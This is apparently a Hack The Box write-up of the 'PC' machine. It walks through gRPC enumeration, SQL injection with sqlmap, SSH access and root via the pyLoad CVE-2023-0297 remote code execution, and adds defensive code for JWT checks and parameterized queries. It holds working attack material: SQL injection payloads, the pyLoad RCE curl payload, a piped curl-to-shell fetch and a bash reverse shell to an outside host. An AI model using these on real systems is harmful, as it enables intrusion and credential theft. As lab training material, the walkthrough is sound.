Hey there, Cyber Warriors!
Cracking the code, stepping into the mind of the creator, and uncovering secrets no one else has discovered yet: this is the thrill of Capture The Flag (CTF) challenges, and today I’ll take you on a fascinating journey through one of the most compelling tasks in Hack The Box: ‘PC’. This isn’t your typical challenge; ‘PC’ takes you to new heights, pushing you to explore not only the common low ports but also the less-traveled terrain of high ports.
The first step is an Nmap scan to discover which ports and services are running on the target:
sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.214
The result is surprising, because only one open port was found:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
To gather more information about this machine, we scan again, this time over all 65535 TCP ports:
sudo nmap -sT -n -Pn -sV -p- -v 10.10.11.214
Now a new port, 50051, shows up:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Searching for information about this port shows that 50051 is the conventional default port for gRPC services.
What is gRPC?
gRPC (Google Remote Procedure Call) is an open-source high-performance RPC (Remote Procedure Call) framework developed by Google. It can run in any environment and allows for communication between services in a variety of ways. Its use of HTTP/2 for transport and Protocol Buffers for message serialization allows for fast, efficient communication between client and server.
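Nmap could not name the service because an HTTP/2 server waits for the client's connection preface and, until then, only sends its own SETTINGS and WINDOW_UPDATE frames, which is exactly what the fingerprint above contains. The following is an added example, not part of the original write-up, that parses those 46 bytes (transcribed from the fingerprint) as HTTP/2 frames; the reading of the non-standard setting 0xfe03 as the identifier grpc-core uses for its true-binary-metadata extension is mine, not something the write-up states.

```python
"""Decode the 46-byte reply Nmap recorded from tcp/50051 as HTTP/2 frames."""
import struct

# Transcribed from Nmap's SF-Port50051 fingerprint: the server sent this
# same 0x2E-byte reply to every probe. bytes.fromhex() skips the spaces.
PORT_50051_REPLY = bytes.fromhex(
    "000018 04 00 00000000"  # header: length=24, type=0x4 SETTINGS, flags=0, stream=0
    "0004 003fffff"          #   SETTINGS_INITIAL_WINDOW_SIZE  = 4194303
    "0005 003fffff"          #   SETTINGS_MAX_FRAME_SIZE       = 4194303
    "0006 00002000"          #   SETTINGS_MAX_HEADER_LIST_SIZE = 8192
    "fe03 00000001"          #   0xfe03: non-standard id used by grpc-core
    "000004 08 00 00000000"  # header: length=4, type=0x8 WINDOW_UPDATE, stream=0
    "003f0000"               #   window size increment = 4128768
)

FRAME_TYPES = {0x0: "DATA", 0x1: "HEADERS", 0x3: "RST_STREAM", 0x4: "SETTINGS",
               0x6: "PING", 0x7: "GOAWAY", 0x8: "WINDOW_UPDATE"}
SETTING_NAMES = {0x1: "HEADER_TABLE_SIZE", 0x2: "ENABLE_PUSH", 0x3: "MAX_CONCURRENT_STREAMS",
                 0x4: "INITIAL_WINDOW_SIZE", 0x5: "MAX_FRAME_SIZE", 0x6: "MAX_HEADER_LIST_SIZE",
                 0xfe03: "GRPC_ALLOW_TRUE_BINARY_METADATA"}  # grpc-core private setting


def parse_frames(data):
    """Split raw bytes into HTTP/2 frames: a 9-byte header followed by `length` payload bytes."""
    frames, off = [], 0
    while off < len(data):
        if len(data) - off < 9:
            raise ValueError("truncated frame header")
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        stream_id = int.from_bytes(data[off + 5:off + 9], "big") & 0x7FFFFFFF  # top bit reserved
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        frames.append({"type": FRAME_TYPES.get(ftype, f"0x{ftype:02x}"),
                       "flags": flags, "stream": stream_id, "payload": payload})
        off += 9 + length
    return frames


def decode_settings(payload):
    """A SETTINGS payload is a run of (16-bit identifier, 32-bit value) pairs."""
    if len(payload) % 6:
        raise ValueError("SETTINGS payload length must be a multiple of 6")
    return {SETTING_NAMES.get(sid, f"0x{sid:04x}"): val
            for sid, val in struct.iter_unpack(">HI", payload)}


def looks_like_grpc(data):
    """True for an HTTP/2 server preface whose SETTINGS carry grpc-core's 0xfe03 setting."""
    try:
        frames = parse_frames(data)
    except ValueError:
        return False  # not HTTP/2 framing at all
    if not frames or frames[0]["type"] != "SETTINGS" or frames[0]["stream"] != 0:
        return False
    return "GRPC_ALLOW_TRUE_BINARY_METADATA" in decode_settings(frames[0]["payload"])


if __name__ == "__main__":
    for frame in parse_frames(PORT_50051_REPLY):
        print(frame["type"], "stream", frame["stream"], frame["payload"].hex())
    print("gRPC?", looks_like_grpc(PORT_50051_REPLY))
```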
While looking into how to interact with this kind of service, I found this article by Microsoft:
https://learn.microsoft.com/en-us/aspnet/core/grpc/test-tools?view=aspnetcore-7.0
The article shows how different tools can be used to interact with a gRPC service. I chose 'grpcurl'; more information is available on GitHub (https://github.com/fullstorydev/grpcurl). We can download the tool for our Kali Linux from the releases page:
https://github.com/fullstorydev/grpcurl/releases
Let’s try to discover more information with grpcurl:
./grpcurl 10.10.11.214:50051 describe
Failed to dial target host "10.10.11.214:50051": tls: first record does not look like a TLS handshake
The server is not speaking TLS, so we force a plaintext connection with the -plaintext flag:
./grpcurl -plaintext 10.10.11.214:50051 describe
SimpleApp is a service:
service SimpleApp {
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}
grpc.reflection.v1alpha.ServerReflection is a service:
service ServerReflection {
rpc ServerReflectionInfo ( stream .grpc.reflection.v1alpha.ServerReflectionRequest ) returns ( stream .grpc.reflection.v1alpha.ServerReflectionResponse );
}
Server reflection is enabled, so grpcurl can list the services without any .proto files: an application named 'SimpleApp' exposes three methods. Now we check what data each method expects:
- LoginUser: logs into the application; takes 'username' and 'password' parameters.
./grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest
LoginUserRequest is a message:
message LoginUserRequest {
string username = 1;
string password = 2;
}
- RegisterUser: registers a new user in the application; takes 'username' and 'password' parameters.
./grpcurl -plaintext 10.10.11.214:50051 describe RegisterUserRequest
RegisterUserRequest is a message:
message RegisterUserRequest {
string username = 1;
string password = 2;
}
- getInfo: returns information about a user; takes an 'id' parameter.
./grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
string id = 1;
}
At this point we can call the 'getInfo' method with an example 'id' to learn more:
./grpcurl -d '{"id":"1"}' -plaintext 10.10.11.214:50051 SimpleApp/getInfo
The application returns an error: the request needs an authentication token in a 'token' header:
{
"message": "Authorization Error.Missing 'token' header"
}
Let's register a new user. That may let us log in and, from there, look up information about other users:
./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/RegisterUser
Resolved method descriptor:
rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
Request metadata to send:
(empty)
Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip
Estimated response size: 35 bytes
Response contents:
{
"message": "Account created for user example!"
}
Response trailers received:
(empty)
Sent 1 request and received 1 response
With the user created, we log in to see what the application gives us back:
./grpcurl -d '{"username":"example", "password":"example"}' -vv -plaintext 10.10.11.214:50051 SimpleApp/LoginUser
The login succeeds, and the response trailers carry the token we need for the 'getInfo' method:
Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
Request metadata to send:
(empty)
Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip
Estimated response size: 17 bytes
Response contents:
{
"message": "Your id is 706."
}
Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg'
Sent 1 request and received 1 response
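The token in the trailers is a JSON Web Token (the b'...' wrapper is a Python bytes repr, which fits the Python process seen later in the process list). As an added example that is not part of the original write-up, the code below reads the token's claims and shows the verification a server must perform before honoring the 'token' header; the signing secret and the freshly issued token in the test are constructed, since the box's real secret is unknown.

```python
"""Read the claims in the LoginUser token, and verify HS256 tokens the way the server must."""
import base64
import hashlib
import hmac
import json
import time

# Token copied from the LoginUser response trailers (without the b'...' wrapper).
LOGIN_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
               "eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0."
               "PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg")


def _b64url_decode(segment):
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def read_claims(token):
    """Decode header and payload WITHOUT checking the signature: fine for inspection, never for authorization."""
    header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def sign_hs256(claims, secret):
    """Issue a token as a LoginUser handler would (constructed: the box's real secret is unknown)."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    tag = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(tag)}"


def verify_hs256(token, secret, now=None):
    """Return the claims only if the algorithm is pinned, the HMAC matches and exp is in the future; else None."""
    try:
        header, body, signature = token.split(".")
        if json.loads(_b64url_decode(header)).get("alg") != "HS256":
            return None  # never let the token choose its own algorithm
        expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(signature)):
            return None
        claims = json.loads(_b64url_decode(body))
        current = time.time() if now is None else now
        if claims.get("exp", 0) <= current:  # a token without exp is treated as expired
            return None
        return claims
    except (ValueError, TypeError, AttributeError):
        return None


if __name__ == "__main__":
    hdr, claims = read_claims(LOGIN_TOKEN)
    print(hdr, claims)  # {'typ': 'JWT', 'alg': 'HS256'} {'user_id': 'example', 'exp': 1685712619}
```

Note that the claims identify the user by name ('example'), not by the numeric id 706 that LoginUser reported; the 'id' sent to getInfo is therefore a separate, client-chosen value.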
Now we can call 'getInfo' with our token:
./grpcurl -d '{"id":"706"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -vv -plaintext 10.10.11.214:50051 SimpleApp/getInfo
The call now succeeds, but for our own id the application only returns a placeholder message:
Resolved method descriptor:
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
Request metadata to send:
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg
Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip
Estimated response size: 19 bytes
Response contents:
{
"message": "Will update soon."
}
Response trailers received:
(empty)
Sent 1 request and received 1 response
If we try 'id' 1 instead, we get a different message:
./grpcurl -d '{"id":"1"}' -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg' -plaintext 10.10.11.214:50051 SimpleApp/getInfo
{
"message": "The admin is working hard to fix the issues."
}
At this point we switch to another tool, 'grpcui', which exposes the gRPC service through a web user interface; it is available on GitHub (https://github.com/fullstorydev/grpcui/releases). After downloading it, we open a session against the service:
./grpcui -plaintext 10.10.11.214:50051
Running the command opens the grpcui web interface for the gRPC service. The next step is to capture the 'getInfo' request so we can modify it and test it for injection:
Once the request is ready, we redirect it to Burp Suite with the browser extension 'FoxyProxy'; before using it, we configure our proxy in the extension's settings:
With the request in Burp Suite, we try SQL injection. Why? Because a bit of research shows that services like this are frequently vulnerable to SQL injection:
We send the request to Repeater and save it to a file:
The request is now saved:
Now we run sqlmap against the saved request to look for SQL injection:
sudo sqlmap -r pc.req
The scan reports that the application is vulnerable to SQL injection through the 'id' parameter (SQLite backend):
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 8736=8736"}]}
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"1 AND 4960=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZXhhbXBsZSIsImV4cCI6MTY4NTcxMjYxOX0.PLDt1weY4ozJzlgZ_sngkh0hAWhqZ9K0ufeXNOA8rVg"}],"data":[{"id":"-4905 UNION ALL SELECT CHAR(113,122,122,113,113)||CHAR(81,101,109,108,117,118,88,107,120,77,88,108,82,76,75,89,112,66,109,71,83,74,119,104,100,110,110,74,74,77,78,122,78,86,122,80,111,81,104,105)||CHAR(113,98,98,106,113)-- hDmD"}]}
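Why sqlmap's boolean-based payload works, and how the lookup should have been written, as an added example that is not the box's application code (its source is never shown): the SQLite schema and rows below are constructed to mirror the messages seen above. Binding the parameter removes the injection; it does not by itself stop an authenticated user from requesting any other user's id, which needs a separate authorization check.

```python
"""Reproduce the boolean-based blind signal sqlmap reported for 'id', and the fix."""
import sqlite3

# Constructed stand-in for the box's database. The write-up never shows the app's
# schema; only that sqlmap found a SQLite backend with tables 'accounts' and 'messages'.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE accounts (username TEXT, password TEXT);
        INSERT INTO accounts VALUES ('admin', 'admin');
        CREATE TABLE messages (id INTEGER PRIMARY KEY, message TEXT);
        INSERT INTO messages VALUES (1, 'The admin is working hard to fix the issues.');
        INSERT INTO messages VALUES (706, 'Will update soon.');
    """)
    return db


def get_info_vulnerable(db, user_id):
    """The pattern sqlmap's findings imply: the 'id' string is spliced into the SQL text."""
    row = db.execute(f"SELECT message FROM messages WHERE id = {user_id}").fetchone()
    return row[0] if row else None


def get_info_safe(db, user_id):
    """Fixed lookup: validate the type, then bind the value so it can never be parsed as SQL."""
    try:
        uid = int(user_id)  # ids are numeric; anything else is rejected before any query runs
    except (TypeError, ValueError):
        return None
    row = db.execute("SELECT message FROM messages WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    # sqlmap's first payload: a true condition leaves the result unchanged, a false one empties it.
    print(get_info_vulnerable(db, "1 AND 8736=8736"))  # admin message, same as plain id 1
    print(get_info_vulnerable(db, "1 AND 8736=8737"))  # None
    print(get_info_safe(db, "1 AND 8736=8736"))        # None: rejected, never reaches SQLite
```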
Knowing the application is vulnerable, we enumerate the tables in the database (the backend is SQLite, as sqlmap reported):
sudo sqlmap -r pc.req --dbms=SQLite --tables
Two tables come back:
[13:16:57] [INFO] fetching tables for database: 'SQLite_masterdb'
<current>
[2 tables]
+----------+
| accounts |
| messages |
+----------+
The 'accounts' table is the interesting one, so we dump it with sqlmap too:
sudo sqlmap -r pc.req --dbms=SQLite -T accounts --dump
It holds usernames and passwords stored in plaintext; we can try them over SSH:
Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| REPLACED | REPLACED |
+------------------------+----------+
Now we check whether the discovered credentials work over SSH:
└─$ ssh sau@10.10.11.214
Finally, we can reach the user flag:
Next we enumerate the machine with LinPEAS. First we start an HTTP server on our attacking machine to serve the script:
sudo python3 -m http.server 80
Then, on the target, we run LinPEAS in memory:
curl http://10.10.16.64/linpeas.sh | sh >> linpeas.log
LinPEAS lists the running processes; note /usr/bin/python3 /opt/app/app.py and /usr/local/bin/pyload, both running as root:
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 486 0.0 0.0 2488 512 ? S 05:36 0:00 _ bpfilter_umh
root 1 0.0 0.2 167996 11532 ? Ss 05:36 0:02 /sbin/init
root 464 0.3 2.0 163632 80964 ? S<s 05:36 0:25 /lib/systemd/systemd-journald
root 514 0.0 0.1 20176 5864 ? Ss 05:36 0:00 /lib/systemd/systemd-udevd
systemd+ 534 0.0 0.1 19080 7608 ? Ss 05:36 0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root 679 0.0 0.4 280192 18004 ? SLsl 05:36 0:00 /sbin/multipathd -d -s
root 707 0.0 0.0 11356 1680 ? S<sl 05:36 0:00 /sbin/auditd
root 738 0.0 0.2 49296 10444 ? Ss 05:36 0:00 /usr/bin/VGAuthService
root 739 0.1 0.2 239496 8092 ? Ssl 05:36 0:10 /usr/bin/vmtoolsd
root 770 0.0 0.1 99900 5980 ? Ssl 05:36 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 819 0.0 0.2 241052 9180 ? Ssl 05:36 0:03 /usr/lib/accountsservice/accounts-daemon
message+ 820 0.0 0.1 7572 4436 ? Ss 05:36 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root 833 0.0 0.0 81956 3648 ? Ssl 05:36 0:00 /usr/sbin/irqbalance --foreground
root 834 0.0 0.4 29876 18312 ? Ss 05:36 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 835 0.0 0.2 236440 9040 ? Ssl 05:36 0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog 836 0.2 0.1 224344 5352 ? Ssl 05:36 0:16 /usr/sbin/rsyslogd -n -iNONE
root 838 0.0 1.0 875264 41940 ? Ssl 05:36 0:01 /usr/lib/snapd/snapd
root 839 0.0 0.1 17492 7760 ? Ss 05:36 0:00 /lib/systemd/systemd-logind
root 841 0.0 0.3 395492 13836 ? Ssl 05:36 0:00 /usr/lib/udisks2/udisksd
root 886 0.0 0.3 318824 13412 ? Ssl 05:36 0:00 /usr/sbin/ModemManager
root 1054 0.4 0.7 634840 31420 ? Ssl 05:36 0:35 /usr/bin/python3 /opt/app/app.py
root 1060 0.0 1.5 1221072 62468 ? Ssl 05:36 0:06 /usr/bin/python3 /usr/local/bin/pyload
root 1073 0.0 0.0 8540 2940 ? Ss 05:36 0:00 /usr/sbin/cron -f
daemon 1077 0.0 0.0 3796 2276 ? Ss 05:36 0:00 /usr/sbin/atd -f
root 1082 0.0 0.0 5828 1984 tty1 Ss+ 05:36 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
sau 1714 0.0 0.1 13960 6088 ? S 06:11 0:00 | _ sshd: sau@pts/1
sau 1715 0.0 0.1 9988 5012 pts/1 Ss+ 06:11 0:00 | _ -bash
sau 2196 0.0 0.1 13964 5304 ? S 07:39 0:00 _ sshd: sau@pts/0
sau 2197 0.0 0.1 9988 4936 pts/0 Ss 07:39 0:00 _ -bash
sau 2224 0.0 0.2 26536 10856 pts/0 S+ 07:45 0:00 _ curl http://10.10.16.64/linpeas.sh
sau 2225 0.4 0.0 3532 2728 pts/0 S+ 07:45 0:00 _ sh
sau 5451 0.0 0.0 3532 1020 pts/0 S+ 07:46 0:00 _ sh
sau 5455 0.0 0.0 10952 3616 pts/0 R+ 07:46 0:00 | _ ps fauxwww
sau 5454 0.0 0.0 3532 1020 pts/0 S+ 07:46 0:00 _ sh
systemd+ 1279 0.0 0.3 24448 12172 ? Ss 05:42 0:00 /lib/systemd/systemd-resolved
sau 1356 0.0 0.2 19104 9844 ? Ss 05:43 0:00 /lib/systemd/systemd --user
sau 1359 0.0 0.0 169352 3388 ? S 05:43 0:00 _ (sd-pam)
sau 5342 0.0 0.1 7108 4088 ? Ss 07:45 0:00 _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
We can also see the listening ports:
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Port 8000 is listening on 127.0.0.1 only, so we query it from our SSH session to see what service is running there:
sau@pc:~$ curl http://127.0.0.1:8000
It is a web application, and the response redirects us to a login URL:
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F">/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F</a>. If not, click the link.
We follow that URL:
sau@pc:~$ curl http://127.0.0.1:8000/login
It is the login page of pyLoad. Searching online turns up this write-up of a pre-auth RCE in pyLoad (CVE-2023-0297):
https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
It also includes proof-of-concept code:
sau@pc:~$ curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://<target>/flash/addcrypted2'
We use this to get a reverse shell. From https://www.revshells.com I selected this one:
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.16.64/9000 0>&1
Make it executable:
sau@pc:~$ chmod +x rv.sh
With the reverse shell script in place, we start our netcat listener:
sudo nc -nlvp 9000
Now we adapt the proof-of-concept to run our reverse shell script (executed from the SSH session on the target, against the pyLoad port on localhost):
sau@pc:~$ curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/rv.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'
Finally, we receive a connection with root privileges:
The last step is to grab the root flag!
In closing, I would like to emphasize that the realm of cyber security is a constantly evolving landscape. As we venture through this dynamic world, it’s important to continue learning and adapting. Each Capture The Flag challenge, each line of code, each high port we encounter serves as a reminder that there’s always more to learn.
Remember, enumeration isn’t just about counting; it’s about understanding, getting into the minutiae of systems, and revealing hidden vulnerabilities. It’s through meticulous probing and exploration that we truly get to the heart of the system. Injections aren’t merely exploits, but valuable lessons in recognizing and mitigating risks.
In our journey to secure cyberspace, it’s our curiosity and persistence that drive us forward. It’s about asking the right questions, cracking the code, and leaving no stone unturned. As we step into tomorrow, let’s continue to challenge assumptions, elevate our knowledge, and shape the future of cyber security.
Remember, the greatest weapon in the world of cyber security is knowledge. Stay curious, stay vigilant, and most importantly, never stop learning.